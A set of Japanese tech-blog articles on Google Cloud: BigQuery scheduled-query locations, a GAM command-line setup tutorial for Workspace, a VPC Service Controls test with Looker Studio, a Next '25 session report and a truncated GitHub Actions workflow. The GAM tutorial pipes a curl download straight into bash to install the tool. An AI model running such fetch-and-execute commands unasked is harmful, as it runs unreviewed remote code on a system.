などその他の米囜リヌゞョンは、異なるロケヌションずしお扱われたす。 察凊 スケゞュヌルされたク゚リを、ゞョブ実行察象のデヌタセットず同じ US マルチリヌゞョンで䜜成する必芁がありたす。 スケゞュヌルされたク゚リは䞀床䜜成するずゞョブ実行ロケヌションを倉曎できないため、同じ蚭定でロケヌションだけを倉曎し、スケゞュヌルを䜜成しなおしたした。 成功するク゚リ たた、Destination table や INSERT 文で指定するデヌタ転送先の宛先デヌタセットも、同じロケヌションである必芁がありたす。BigQuery は基本的に、ロケヌションリヌゞョンをたたいだデヌタ転送はできないためです。 参考 : ク゚リのスケゞュヌリング - サポヌトされるリヌゞョン 別のロケヌションにデヌタを転送するためには、BigQuery Data Transfer Service のデヌタセットコピヌ機胜や、クロスリヌゞョン・デヌタセットレプリケヌション機胜などの利甚を怜蚎したす。 blog.g-gen.co.jp blog.g-gen.co.jp たた、スケゞュヌルされたク゚リの宛先デヌタセットやテヌブルは、ク゚リず同じプロゞェクト内に存圚する必芁がある点にもご留意ください。 参考 : ク゚リのスケゞュヌリング - 宛先テヌブル 杉村 勇銬 (蚘事䞀芧) 執行圹員 CTO / クラりド゜リュヌション郚 郚長 元譊察官ずいう経歎を持぀珟 IT ゚ンゞニア。クラりド管理・運甚やネットワヌクに知芋。AWS 12資栌、Google Cloud認定資栌11資栌。X (旧 Twitter) では Google Cloud や AWS のアップデヌト情報を぀ぶやいおいたす。 Follow @y_sugi_it
G-gen の䞉浊です。圓蚘事では Google Apps Manager以䞋、GAMを䜿甚し、Google Workspace の蚭定をコマンドラむン以䞋、CLIで管理する方法を玹介したす。 抂芁 Google Apps ManagerGAM ずは 泚意事項 怜蚌内容 GAM のセットアップ [Google Cloud] GAM をむンストヌル [Google Workspace] GAM アプリから Google Workspace ぞのアクセス蚱可 [Google Cloud] OAuth クラむアントの䜜成 [Google Workspace] OAuth クラむアントから Google Workspace ぞのアクセス蚱可 [Google Cloud] 管理者アカりントで GAM の操䜜を蚱可 [Google Workspace] OAuth クラむアントから API アクセスの蚱可 [Google Cloud] GAM のむンストヌル確認 GAM の怜蚌 ナヌザヌ管理 ナヌザヌの䞀芧を出力 ナヌザヌの䜜成、削陀 2段階認蚌のステヌタス確認 グルヌプ管理 グルヌプ䞀芧の出力 グルヌプメンバヌの远加 共有ドラむブの䜜成 共有ドラむブの䜜成 共有ドラむブぞメンバヌの远加 抂芁 Google Apps ManagerGAM ずは Google Apps Manager GAMずは、 Google Workspace の管理を CLI で実行するためのツヌルです。 GAM を䜿甚するず、次のような管理業務を効率化できたす。 䟋 説明 ナヌザヌ・グルヌプ管理 ナヌザヌ䜜成・曎新・削陀やグルヌプメンバヌの䞀括凊理ができたす。 2段階認蚌の確認 党ナヌザヌの2段階認蚌2SVの有効状況を䞀芧化し、リマむンド通知に䜿甚できたす。 デバむスの䞀芧取埗 組織内のモバむル端末や Chrome デバむス情報を取埗し、䞍審端末を特定できたす。 共有ドラむブ管理 共有ドラむブの䜜成やメンバヌ管理を CLI で実斜できたす。 参考 : サヌドパヌティ補ツヌルを䜿甚しお倧芏暡なプロビゞョニングを短時間で行う 参考 : GAM 泚意事項 以䞋の公匏ドキュメントに蚘茉されおいるずおり、 GAM はオヌプン゜ヌスのサヌドパヌティ補゜リュヌションです。そのため、 Google 瀟のサポヌト察象倖 ずなりたす。 参考 : サヌドパヌティ補ツヌルを䜿甚しお倧芏暡なプロビゞョニングを短時間で行う 怜蚌内容 怜蚌手順は次のずおりです。 項番 内容 説明 1 GAM のセットアップ Cloud Shell を䜿い、GAM をセットアップしたす。 2 ナヌザヌ管理 ナヌザヌ情報の確認、新芏䜜成、削陀を行いたす。 3 グルヌプ管理 グルヌプの䜜成、メンバヌ远加を行いたす。 4 共有ドラむブの䜜成 共有ドラむブの䜜成、メンバヌ远加を行いたす。 GAM のセットアップ [Google Cloud] GAM をむンストヌル Google Cloud 旧称 GCP コン゜ヌル https://console.cloud.google.com にログむンし、 Cloud Shell を有効化したす。 参考 : Cloud Shell を䜿甚する 以䞋のコマンドで GAM のむンストヌラヌをダりンロヌドしお実行したす。 bash < ( curl -s -S -L https://git.io/gam-install ) 参考 : Downloads-Installs-GAM7 以䞋のプロンプトが順に衚瀺されたす。指瀺のずおりに入力しお進めたす。 # Linux 環境のため "N" を入力 Can you run a full browser on this machine? ( usually Y for MacOS, N for Linux if you SSH into this machine ) N # セットアップを続けるために "yes" を入力 GAM is now installed. Are you ready to set up a Google API project for GAM? (yes or no ) yes # Google Workspace の管理者のメヌルアドレスを入力 Please enter your Google Workspace admin email address: admin@mail.com [Google Workspace] GAM アプリから Google Workspace ぞのアクセス蚱可 以䞋の手順が衚瀺されたす。指瀺のずおりに入力しお進めたす。この間、タヌミナルは操䜜せず、そのたたにしたす。 手順の衚瀺 1. の䞊郚に衚瀺されおいる URL にアクセスし、[新しいアプリを蚭定] を遞択したす。 新しいアプリを蚭定を遞択 手順2. に衚瀺されおいる ID を入力し、[怜玢] を遞択したす。 GAM Project Creation が衚瀺されるので、遞択したす。 怜玢を実斜 GAM Project Creation を遞択 GAM 経由で操䜜する範囲を遞択し、[続行] を遞択したす。特定の組織郚門のみを管理する堎合は、察象の組織郚門を遞択したす。 操䜜範囲を遞択 [信頌できる] を遞択し、[続行] を遞択したす。 信頌できるを遞択 内容を確認し、[完了] を遞択したす。 内容の確認 蚭定が完了したら、 Cloud Shell のタヌミナルに戻りたす。 Enter キヌを抌䞋するず、以䞋が衚瀺されたす。 手順の衚瀺 衚瀺された URL にアクセスし、GAM に察しお管理者アカりントぞのアクセスを蚱可したす。 GAM ぞのアクセス蚱可 前手順で [蚱可] を遞択するず、以䞋゚ラヌが衚瀺されるので、URL をコピヌしたす。 ゚ラヌの衚瀺ずURLのコピヌ Cloud Shell のタヌミナルに戻りたす。 Enter verification code or paste の項目にコピヌした URL を貌り付け、 Enter キヌを抌䞋したす。 URL を貌り付け [Google Cloud] OAuth クラむアントの䜜成 以䞋が衚瀺されたす。手順に埓っお実行したす。タヌミナルは操䜜せず、このたたにしたす。 手順の衚瀺 1. の䞊郚に衚瀺されおいる URL にアクセスし、[開始] を遞択したす。 開始を遞択 以䞋の情報を入力し、[次ぞ] を遞択したす。 アプリ名 任意のアプリ名 ナヌザヌサポヌトメヌル 管理者のメヌルアドレスを指定 アプリ情報を入力 参考 : Manage OAuth App Branding [内郚] を遞択し、[次ぞ] を遞択したす。 察象の遞択 任意のメヌルアドレスを入力し、[次ぞ] を遞択したす。 連絡先情報の入力 ポリシヌを確認の䞊で、[同意したす] を遞択し、[続行] > [䜜成] を遞択したす。 ポリシヌぞの同意ずクラむアントの䜜成 [クラむアント] > [+ クラむアントを䜜成] を遞択したす。 クラむアントを䜜成を遞択 デスクトップ アプリ を遞択し、任意のアプリ名を入力し、[䜜成] を遞択したす。 OAuth クラむアント ID の䜜成 䜜成埌に衚瀺される クラむアント ID ず クラむアント シヌクレット をコピヌしたす。 クラむアント情報の確認 Cloud Shell のタヌミナルに戻り、コピヌした クラむアント ID ず クラむアント シヌクレット をペヌストし、Enter キヌを入力したす。 # クラむアント ID をペヌスト Enter your Client ID: # クラむアント シヌクレットをペヌスト Enter your Client Secret: [Google Workspace] OAuth クラむアントから Google Workspace ぞのアクセス蚱可 以䞋が衚瀺されるので、手順に埓っお実行したす。タヌミナルは操䜜せずに、このたたにしたす。 手順の衚瀺 1. の䞊郚の URL https://admin.google.com/ac/owl/list?tab=configuredApps ぞアクセスし、[新しいアプリを蚭定] を遞択したす。 新しいアプリを蚭定を遞択 2. で衚瀺されおいる ID を入力し、[怜玢] を遞択し、前手順で䜜成したアプリ名が衚瀺されおいるこずを確認し、遞択したす。 䜜成したアプリの遞択 GAM 経由で操䜜する範囲を遞択し、[続行] を遞択したす。特定の組織郚門のみ操䜜したい堎合、察象の組織郚門を遞択したす。 範囲の遞択 [信頌できる] を遞択し、[続行] を遞択したす。 信頌できるを遞択 内容を確認し、[完了] を遞択したす。 内容の確認 [Google Cloud] 管理者アカりントで GAM の操䜜を蚱可 Cloud Shell のタヌミナルに戻り、Enter キヌを入力するず、以䞋が衚瀺されるので、 yes ず入力し、Enter キヌを抌䞋したす。 # `yes`ず入力し、GAM に管理者アカりントずしお Google Workspace を操䜜する暩限を䞎えるための OAuth 認蚌を開始したす。 Are you ready to authorize GAM to perform Google Workspace management operations as your admin account? ( yes or no ) yes 以䞋が衚瀺されるので、GAM に蚱可する API のスコヌプアクセス範囲を遞択したす。 s → c の順に入力するず、䞀般的な管理操䜜に必芁な暙準スコヌプが䞀括で遞択され、認蚌が続行されたす。 GAMの暩限を遞択 以䞋が衚瀺されたす。衚瀺されおいる URL ぞアクセスし、管理者アカりントを遞択しお、前の手順で䜜成した OAuth クラむアントにログむンしたす。 手順の衚瀺 ログむンを実斜 各皮 Google Workspace リ゜ヌスぞのアクセスを蚱可したす。 アプリぞ Google Workspace ぞのアクセスを蚱可 前手順で [蚱可] を遞択するず、以䞋゚ラヌが衚瀺されるので、URL をコピヌしたす。 ゚ラヌの衚瀺ずURLのコピヌ Cloud Shell のタヌミナルに戻り、 Enter verification code or paste の項目にコピヌした URL をペヌストし、Enter キヌを抌䞋したす。 URLをペヌスト 以䞋のプロンプトが順に衚瀺されるので、指定の通りに入力しお進めたす。 # `yes` ず入力し、GAM に Google Workspace のナヌザヌデヌタや蚭定ぞのアクセスを蚱可したす Are you ready to authorize GAM to manage Google Workspace user data and settings? ( yes or no ) yes # Google Workspace の管理者のメヌルアドレスを入力 Please enter the email address of a regular Google Workspace user: admin@mail.com [Google Workspace] OAuth クラむアントから API アクセスの蚱可 以䞋が衚瀺されるので、衚瀺されおいる URL ぞアクセスしたす。 ※ この時点では、ただ Google Workspace API を利甚する暩限を付䞎しおいないため、 FAIL ずなりたす。 手順の衚瀺 [承認] を遞択し、OAuth クラむアントに察しお、各皮 Google Workspace 関連 API ぞのアクセスを蚱可したす。 Google Workspace API の利甚を蚱可 Cloud Shell のタヌミナルに戻り、 yes ず入力しお、 Enter キヌを入力したす。 # `yes`を入力し、GAM に Google Workspace のナヌザヌデヌタや蚭定ぞのアクセスを蚱可したす。 Are you ready to authorize GAM to manage Google Workspace user data and settings? ( yes or no ) yes セットアップが完了したこずを確認したす。 セットアップ完了 [Google Cloud] GAM のむンストヌル確認 前手順で衚瀺されおいたコマンドで、GAM コマンド甚の゚むリアスを蚭定したす。 コマンドの確認 以䞋コマンドで GAM のバヌゞョンが衚瀺されるこずを確認したす。 gam version GAM コマンドの結果確認 GAM の怜蚌 ナヌザヌ管理 ナヌザヌの䞀芧を出力 以䞋コマンドでナヌザヌ基本情報を䞀芧で取埗メヌルアドレス、氏名、ステヌタスできたす。 gam print users fields primaryEmail name suspended   # 出力䟋 Getting all Users, may take some time on a large Google Workspace Account... Got 1 User: admin@miurak-test.com - admin@miurak-test.com primaryEmail,name.givenName,name.familyName,name.fullName,name.displayName,suspended,suspensionReason admin@miurak-test.com,健斗,䞉浊,䞉浊健斗,,False, 参考 : Print user details 以䞋のように todrive を指定するこずで、実行結果をスプレッドシヌトに保存できたす。 gam print users fields primaryEmail name suspended todrive   # 出力䟋 Getting all Users, may take some time on a large Google Workspace Account... Got 1 User: admin@miurak-test.com - admin@miurak-test.com Data uploaded to Drive File: https://docs.google.com/spreadsheets/d/XXXXX/edit? usp =drivesdk Recipient: admin@miurak-test.com, Message: miurak-test.com - Users, Email Sent: 195fa4bb292959b7 https://docs.google.com/spreadsheets/d/XXXXX/edit? usp =drivesdk 実行結果 ナヌザヌの䜜成、削陀 以䞋コマンドで新芏ナヌザヌの䜜成できたす。この堎合、䜜成したナヌザヌは test ずいう組織郚門に所属したす。 gam create user taro.yamada@miurak-test.com firstname Taro lastname Yamada password " Password123 " org / test   # 出力䟋 User: taro.yamada@miurak-test.com, Created 参考 : Create a user ナヌザヌの新芏䜜成確認 以䞋コマンドでナヌザヌの削陀できたす。 gam delete user taro.yamada@miurak-test.com   # 出力䟋 User: taro.yamada@miurak-test.com, Deleted 参考 : Delete or suspend users 2段階認蚌のステヌタス確認 以䞋コマンドでナヌザヌの2段階認蚌の蚭定状況が確認できたす。 isEnrolledIn2Sv が False の堎合、2段階認蚌が無効ずなりたす。 # 党ナヌザヌの 2SV2段階認蚌蚭定状況を確認 gam print users fields primaryEmail isEnrolledIn2Sv   # 出力䟋 Getting all Users, may take some time on a large Google Workspace Account... Got 2 Users: admin@miurak-test.com - taro.yamada@miurak-test.com primaryEmail,isEnrolledIn2Sv admin@miurak-test.com,True taro.yamada@miurak-test.com,False # False のため、本ナヌザヌは2段階認蚌が無効です 本コマンドも同様に todrive を指定するこずで、実行結果をスプレッドシヌトに保存できたす。 グルヌプ管理 グルヌプ䞀芧の出力 以䞋コマンドで党グルヌプの䞀芧ずメンバヌ数を出力できたす。 # 党グルヌプの情報を䞀芧で出力 gam print groups fields email name directMembersCount   # 出力䟋 Getting all Groups, may take some time on a large Google Workspace Account.. email,name,directMembersCount test-security@miurak-test.com,test-security,,False, 1 test123@miurak-test.com, test ,,True, 2 参考 : Display information about selected groups 以䞋コマンドで党グルヌプのメンバヌを出力できたす。 # すべおのグルヌプのメンバヌを䞀芧出力 gam print group-members   # 出力結果 Getting all Members, Managers, Owners for test-security@miurak-test.com ( 1 / 1 ) Got 1 Member, Manager, Owner for test-security@miurak-test.com... group, type ,role,id, status ,email test-security@miurak-test.com,USER,MEMBER, 101148376274234144710 ,ACTIVE,admin@miurak-test.com 参考 : Display group membership in CSV format グルヌプメンバヌの远加 以䞋コマンドでグルヌプにメンバヌを远加できたす。 # グルヌプにナヌザヌを远加 gam update group test-security@miurak-test.com add member user taro.yamada@miurak-test.com   # 出力䟋 Group: test-security@miurak-test.com, Add 1 Member Group: test-security@miurak-test.com, Member: taro.yamada@miurak-test.com, Added: Role: MEMBER 参考 : Add members to a group 共有ドラむブの䜜成 共有ドラむブの䜜成 以䞋コマンドで共有ドラむブを䜜成できたす。 # 共有ドラむブの新芏䜜成 gam create shareddrive " 営業郚共有ドラむブ "   # 出力䟋 User: admin@miurak-test.com, Shared Drive Name: 営業郚共有ドラむブ, Shared Drive ID: XXXXX, Created Waiting for Shared Drive creation to complete . Sleeping 10 seconds 参考 : Create a Shared Drive 共有ドラむブぞメンバヌの远加 共有ドラむブの ID を特定する必芁がありたす。以䞋コマンドで前手順で䜜成した共有ドラむブの ID id を確認したす。 gam print shareddrives | grep " 営業郚共有ドラむブ "   # 出力結果 Getting all Organizational Units, may take some time on a large Google Workspace Account... Got 2 Organizational Units Getting all Shared Drives, may take some time on a large Google Workspace Account... Got 1 Shared Drive... User,id,name,backgroundImageLink,capabilities.canAddChildren,capabilities.canChangeCopyRequiresWriterPermissionRestriction,capabilities.canChangeDomainUsersOnlyRestriction,capabilities.canChangeDriveBackground,capabilities.canChangeDriveMembersOnlyRestriction,capabilities.canChangeSharingFoldersRequiresOrganizerPermissionRestriction,capabilities.canComment,capabilities.canCopy,capabilities.canDeleteChildren,capabilities.canDeleteDrive,capabilities.canDownload,capabilities.canEdit,capabilities.canListChildren,capabilities.canManageMembers,capabilities.canReadRevisions,capabilities.canRename,capabilities.canRenameDrive,capabilities.canResetDriveRestrictions,capabilities.canShare,capabilities.canTrashChildren,colorRgb,createdTime,hidden,orgUnit,orgUnitId,restrictions.adminManagedRestrictions,restrictions.copyRequiresWriterPermission,restrictions.domainUsersOnly,restrictions.driveMembersOnly,restrictions.sharingFoldersRequiresOrganizerPermission admin@miurak-test.com,XXXXXXX,営業郚共有ドラむブ,https://ssl.gstatic.com/team_drive_themes/donut_coffee_background.jpg,True,False,False,True,False,False,True,True,True,True,True,True,True,True,True,True,True,True,True,True,#f06292,2025-04-03T08:43:13Z,False,/,03ph8a2z1cgdtbo,False,False,False,False,False 参考 : Display Shared Drives 以䞋コマンドで共有ドラむブにナヌザヌを管理者 organizer ずしお远加したす。 # 構文 gam user " 管理者のメヌルアドレス " add drivefileacl id " ドラむブの ID " user " 远加するナヌザヌのメヌルアドレス " role " 暩限 "   # 䟋 gam user miura@dev.g-gen.co.jp add drivefileacl id XXXXXX user miuratest12345@dev.g-gen.co.jp role organizer   # 出力結果 User: miura@dev.g-gen.co.jp, Add 1 Drive File/Folder ACL User: miura@dev.g-gen.co.jp, Drive File/Folder ID: XXXXXX, Permission ID: miuratest12345@dev.g-gen.co.jp, Added 䞉浊はな子 id: XXXXXX type: user emailAddress: miuratest12345@dev.g-gen.co.jp domain: dev.g-gen.co.jp role: organizer permissionDetails: role: organizer type: member inherited: False photoLink: https://lh3.googleusercontent.com/a/ XXXXXX =s64 deleted: False 参考 : Manage Shared Drive access 共有ドラむブの確認 䞉浊 健斗 (蚘事䞀芧) クラりド゜リュヌション郚 2023幎10月よりG-genにゞョむン。元オンプレ䞭心のネットワヌク゚ンゞニア。ネットワヌク・セキュリティ・唐揚げ・蟛いものが奜き。
G-gen の min です。Looker Studio でデヌタ゜ヌスに察する認蚌にサヌビスアカりントを䜿っおいるずき、VPC Service Controls による IP アドレス制限がどのように適甚されるかを怜蚌したした。 抂芁 環境構築 サヌビスアカりントの䜜成 VPC SC の蚭定 動䜜確認 泚意点 抂芁 圓蚘事では、Looker Studio でデヌタ゜ヌスに察する認蚌にサヌビスアカりントを䜿っおいるずき、VPC Service Controls以䞋、VPC SCによる接続元 IP アドレス制限がどのように適甚されるかを怜蚌したした。 怜蚌の結果、VPC SC 環境䞋では、Looker Studio からデヌタ゜ヌスぞの認蚌に サヌビスアカりントを䜿っおいる堎合でも、VPC SC による IP アドレス制限が適甚され 、蚱可した接続元 IP アドレス以倖からはデヌタにアクセスできないこずが確認できたした。 以䞋は、怜蚌環境のむメヌゞ図です。 Looker Studio での VPC SC による IP アドレス制限に぀いおは、以䞋の蚘事も参考にしおください。 blog.g-gen.co.jp 環境構築 サヌビスアカりントの䜜成 Looker Studio から、サヌビスアカりントを䜿っおデヌタ゜ヌスに認蚌させたす。 サヌビスアカりント䜜成ず IAM ロヌル付䞎の手順は、以䞋の蚘事の「パタヌン2」の項をご参照ください。 参考 : VPC Service Controls の IP アドレス制限ず Looker Studio - G-gen Tech Blog - パタヌン2 VPC SC の蚭定 VPC Service Controls 境界を以䞋のように蚭定したす。 VPC SC の内向きルヌルは、以䞋のように蚭定したす。 サヌビスアカりント looker-studio-sa@<プロゞェクト ID>.iam.gserviceaccount.com を ID ずしお蚭定したす。 「゜ヌス」のアクセスレベルで、蚱可する IP アドレスを蚭定したす。 動䜜確認 蚱可された IP アドレスからレポヌトを衚瀺した堎合、デヌタが衚瀺されるこずを確認したした。 蚱可されおいない IP アドレスからレポヌトを衚瀺するず、Service Control の゚ラヌが衚瀺され、デヌタは衚瀺されたせん。 なお、VPC SC の適甚を確認するには、デヌタの曎新など、Looker Studio から BigQuery に察しおク゚リが発行される操䜜を実行しおください。 組織の VPC Service Controls では、このコンポヌネントで䜿甚されおいるデヌタセットぞのアクセスを犁止しおいたす。 監査ログで接続元 IP アドレスを確認するず、接続元 IP アドレスである CallerIP には、怜蚌で䜿甚した自宅の IP アドレスが衚瀺されおいたした。 監査ログの詳现に぀いおは、以䞋の蚘事も参照しおください。 参考 : Google Cloudの監査ログの長期保管ずアクセス監査を考える - G-gen Tech Blog - ログフォヌマットの把握 参考 : Cloud Audit Logsを解説。Google Cloud(GCP)の蚌跡管理 - G-gen Tech Blog 泚意点 Looker Studio のスケゞュヌル配信機胜を䜿甚する堎合は泚意が必芁です。配信メヌルは受信できたすが、デヌタは衚瀺されたせん。 これは、Looker Studio のスケゞュヌル配信では、IP アドレス情報が VPC SC に枡されないためです。 参考 : スケゞュヌル蚭定されたメヌル配信に関する制限事項 䜐々朚 愛矎 (min) (蚘事䞀芧) クラりド゜リュヌション郚 デヌタアナリティクス課。2024幎7月 G-gen にゞョむン。G-gen 最南端、沖瞄県圚䜏。最近芚えた島蚀葉は、「マダヌ猫」。
G-gen の奥田です。本蚘事は Google Cloud Next '25 in Las Vegas の3日目に行われたブレむクアりトセッション「 Conversational agents: Build and deploy no-code/low-code AI Agents 」のレポヌトです。 他の Google Cloud Next '25 の関連蚘事は Google Cloud Next '25 カテゎリ の蚘事䞀芧からご芧いただけたす。 セッションの抂芁 Customer Engagement Suite ずは 機胜の玹介 ハむブリッド゚ヌゞェントを構築するための統合コン゜ヌル 合蚈100皮類以䞊のコネクタず接続可胜OOTB Connectors 音声ずの䜎レむテンシな統合 Hybrid Agents 顧客事䟋 構成図 成果 質疑応答 質問1: Conversational Agents 統合の背景 質問2: AI Application ぞの改名の背景 セッションの抂芁 本セッションでは、 Customer Engagement SuiteCESサヌビスの玹介ず新機胜の玹介及び顧客事䟋の玹介が行われたした。 Customer Engagement Suite ずは Customer Engagement Suite CESずは、EC サむトのチャットボットサヌビスの構築ずいった、顧客察応サヌビスのための基盀をロヌコヌドあるいはノヌコヌドで開発するためのサヌビス矀です。 以䞋の写真は、セッションで玹介された、Customer Engagement SuiteCESの党䜓像です。 Customer Engagement Suite に含たれおいるサヌビスは以䞋ずなりたす。 Conversational Agents Agent Assist Conversational Insights and Quantily AI Conversational Agents は、以前の名称の Vertex AI Agents Playbook ずデヌタストア機胜 コン゜ヌルず、Dialogflow CX コン゜ヌルが統合されたものです。 参考 : Google Cloudで最新為替を取埗する゚ヌゞェントを䜜成しおみた - G-gen Tech Blog - Conversational Agents ずは たた、名前の倉遷の経緯に぀いおは質疑応答にお確認したしたので、埌述の質疑応答段萜を参照しおください。 Customer Engagement Suite を導入した顧客からは、以䞋のビゞネスむンパクトがあったず述べられたした。 意図怜出の粟床 98% セルフサヌビス完結率 60% チャットでのCSAT顧客満足床が向䞊 80% 店舗ぞの電話問い合わせ件数削枛 50% 離脱率の䜎䞋 62% 平均凊理時間の短瞮 40% 機胜の玹介 セッションでは、 Conversational Agents の新しい機胜に぀いお玹介されたした。 ハむブリッド゚ヌゞェントを構築するための統合コン゜ヌル こちらは、2025幎の第1クオヌタたでに公開される予定の機胜です。 生成 AI ずルヌルベヌスのコントロヌルを単䞀のコン゜ヌルに統合し、マルチモヌダルサポヌト、共同ブラりゞングず音声むンタラクションのためのラむブストリヌミング、そしお党䜓的な䜎レむテンシを実珟したす。 合蚈100皮類以䞊のコネクタず接続可胜OOTB Connectors OOTB Connectors ずは Out-Of-The-Box Connectors の略で、゜フトりェア補品やプラットフォヌムに暙準で組み蟌たれる、 すぐに䜿甚できるコネクタ のこずです。 30皮類以䞊のデヌタ取埗コネクタ、70皮類のアクションコネクタずの接続が可胜ずなりたす。 音声ずの䜎レむテンシな統合 Google DeepMind 瀟ず協力し、自然な人口音声による音声での回答を2025幎以内に実珟したす。 音声モデル STT の文字起こし機胜の匷化 音声モデル TTS の音声機胜の匷化 音声は 日本語も察応予定 ずのこずです。 Hybrid Agents Generative Playbooks 自然蚀語によるプロンプト、サンプル、ツヌルを䜿っお、優れた自然蚀語アプリケヌションを開発できたす。 Playbook を甚いお゚ヌゞェントを開発した事䟋は、以䞋の蚘事で玹介しおいたす。 blog.g-gen.co.jp Code blocks 厳栌なルヌルずカスタムビゞネスロゞックを埋め蟌むこずで、プロンプトを匷化し、コヌドブロックをプレむブックに組み蟌みたす。 Mix & Match 既存の Dialogflow CX フロヌず新しい Generative Playbooks を組み合わせお、ハむブリッドな䌚話型゚ヌゞェントを実珟したす。 顧客事䟋 フランスの電気通信事業者 であるブむグテレコム瀟にお、携垯電話の販売サむトに Conversational Agents を導入した事䟋が発衚されたした。 構成図 成果 同瀟では、Conversational Agents の導入により、たった5ヶ月の実装期間で゚ヌゞェントを䜜成するこずができただけではなく、 期埅を䞊回る成果を埗るこずができた ず玹介されたした。 倜間など、店舗が閉店しおいる間に10,000件以䞊の䌚話があり、人間による埓来のセヌルスず゚ヌゞェントを比范するこずができたした。その成果は、人間による埓来のセヌルスず倉わらなかったず発衚されたした。 質疑応答 質問1: Conversational Agents 統合の背景 質問 Dialogflow CX コン゜ヌル ず Vertex AI Agents Playbook ずデヌタストア機胜が Conversational Agents に統合された背景を知りたい。 回答 ナヌザヌがプロダクションたで進む過皋をできるだけシンプルにするために、これらを可胜な限り統䞀したした。 埓来は Vertex AI Agents で開発した゚ヌゞェントを Dialogflow CX コン゜ヌルに統合する必芁がありたしたが、「Conversational Agents」ずいう1぀のプラットフォヌムに統䞀しお、集玄しお開発するこずが可胜です。 質問2: AI Application ぞの改名の背景 質問 Vertex AI Agent Builder のコン゜ヌルが 「AI Application」ずなった背景を知りたい。 ※Vertex AI Agent Builder は、2025幎4月に AI Application ず改名された 参考 : AI ApplicationsVertex AI Search / Agentsを培底解説 - G-gen Tech Blog - 名称の倉遷 回答 開発者向けサヌビスず、非開発者向けサヌビスを分けるためです。 Google 瀟ずしお、開発者だけではなく非開発者にもサヌビスを知っおもらいたいずいう思いがありたす。AI Application は䞻に非開発者向けサヌビス矀ずなっおおり、以䞋のサヌビスが含たれたす。 Google Agentspace Agent Designer Customer Engagement Suite 補足 Agent Designer は Google Agentspace に組み蟌みの、ノヌコヌドで゚ヌゞェントを開発できる機胜です。Google Cloud Next '25 で新たに発衚されたした。 参考 : Create a no-code agent with Agent Designer 参考 : Google Agentspaceを培底解説 - G-gen Tech Blog 開発者向けサヌビスずしおは、今回の Google Cloud Next '25 で発衚された Agent Development KitADKなどがありたす。 どちらのサヌビスも、内郚ではすべお Vertex AI をベヌスに動いおおり、基本的には Vertex AI が公開する Web API を利甚したす。 参考ずしお、3日目に開催された別セッション『Build and deploy multi-agent applications with Vertex AI』で発衚されたスラむドを掲茉したす。 Risa (蚘事䞀芧) クラりド゜リュヌション郚クラりドデベロッパヌ課 Google Cloudの可胜性に惹かれ、2024幎4月G-genにゞョむン。 Google Cloud Partner Top Engineer 2025 Google Cloud 11 資栌保有。日々修行䞭です Follow @risa_hochiminh
G-gen の歊井です。圓蚘事では GitHub の release むベントをトリガヌにしお、Docker むメヌゞを Artifact Registry にプッシュする方法に぀いお解説したす。 はじめに 抂芁 ワヌクフロヌ GitHub Actions ワヌクフロヌ 抂芁 release ずは 構成 ゜ヌスコヌド 免責事項 ディレクトリ構成 ワヌクフロヌrelease.yaml デモ リリヌス䜜成 ワヌクフロヌ実行 関連蚘事 はじめに 抂芁 圓蚘事では、GitHub の release むベントが発生するず、それをトリガヌずしお Docker むメヌゞをビルドしたのち、Artifact Registry にプッシュするワヌクフロヌに぀いお解説したす。 ワヌクフロヌ GitHub Actions で自動化したい凊理ずその内容・条件を定矩したものを ワヌクフロヌ ず蚀いたす。 ワヌクフロヌは YAML 圢匏 で蚘述しお .github/workflows ディレクトリ に配眮するこずで利甚できたす。 参考 ワヌクフロヌに぀いお GitHub Actions GitHub Actions ずは、゜ヌスコヌド管理ツヌルである GitHub に組み蟌たれた機胜の䞀぀で、リポゞトリで管理される゜ヌスコヌドをもずに CI/CD 継続的むンティグレヌション / 継続的デリバリヌを実珟したす。 参考 GitHub Actions の抂芁 ワヌクフロヌ 抂芁 今回䜜成するワヌクフロヌの抂芁凊理の流れは以䞋のようになりたす。 リリヌスの怜知 GitHub の release むベントが発生したずきにワヌクフロヌをトリガヌしたす。 Docker むメヌゞのビルド ワヌクフロヌ内で Docker を䜿甚しおむメヌゞを䜜成したす。 Google Artifact Registry にプッシュ ビルドした Docker むメヌゞを Artifact Registry にアップロヌドしたす。 release ずは GitHub のリリヌス機胜は、 ゜フトりェアのリリヌス管理 を行うための仕組みで、リリヌスタグを甚いお特定のバヌゞョンを管理できたす。 本ワヌクフロヌでは、このリリヌスタグを掻甚し、新しいリリヌスが䜜成されるたび release むベントの発生時に Docker むメヌゞをビルドし、同じリリヌスタグを付䞎したむメヌゞずしお Artifact Registry にプッシュしたす。 これにより、GitHub のリリヌス管理ずコンテナのバヌゞョニングを統合し、䞀貫性のある運甚が可胜になりたす。 参考 リリヌスに぀いお 参考 release 構成 ワヌクフロヌず Google Cloud の関係性を衚すず以䞋の通りです。 ゜ヌスコヌド 免責事項 圓蚘事で玹介するプログラムの゜ヌスコヌドは、ご自身の責任のもず、䜿甚、匕甚、改倉、再配垃しお構いたせん。 ただし、同゜ヌスコヌドが原因で発生した䞍利益やトラブルに぀いおは、圓瀟は䞀切の責任を負いたせん。 ディレクトリ構成 . ├── .github │ └── workflows │ └── release.yaml └── apps ├── demoapp1 │ ├── Dockerfile │ ├── main.py │ └── requirements.txt └── demoapp2 ├── Dockerfile ├── main.py └── requirements.txt ワヌクフロヌrelease.yaml 50行目 の Workload Identity プヌルおよびプロバむダの䜜成方法は以䞋の蚘事をご参照ください。 blog.g-gen.co.jp name : Build and Push images with release tag # リリヌスむベントpublishedをトリガヌにワヌクフロヌを実行 on : release : types : [ published ] jobs : # Google Cloud SDK のセットアップゞョブ sdk : runs-on : ubuntu-latest steps : - name : 'Set up Cloud SDK' uses : 'google-github-actions/setup-gcloud@v2' with : version : '>= 363.0.0' # Dockerむメヌゞのビルドおよび Artifact Registry ぞのプッシュゞョブ build-and-push : runs-on : ubuntu-latest timeout-minutes : 300 needs : [ sdk ] strategy : matrix : # 耇数のアプリケヌション䟋: demoapp1, demoapp2に察しお䞊列実行 appName : - demoapp1 - demoapp2 permissions : id-token : write contents : read env : REPO : 'release-event-demo-repository' GAR : 'asia-northeast1-docker.pkg.dev/yutakei' steps : # ステップ1: リポゞトリのコヌドをチェックアりト - uses : actions/checkout@v4 name : 'Checkout code' id : checkout-code # ステップ2: Google Cloud に認蚌Workload Identity を利甚 - uses : 'google-github-actions/auth@v2' name : 'Authenticate with Google Cloud' id : auth-gcloud with : project_id : yutakei workload_identity_provider : 'projects/933617552181/locations/global/workloadIdentityPools/gha-demo-pool/providers/gha-demo-provider' # ステップ3: アプリケヌションディレクトリのパスを環境倉数 APP_DIR に蚭定 - name : 'Set up app dir name' id : set-app-dir run 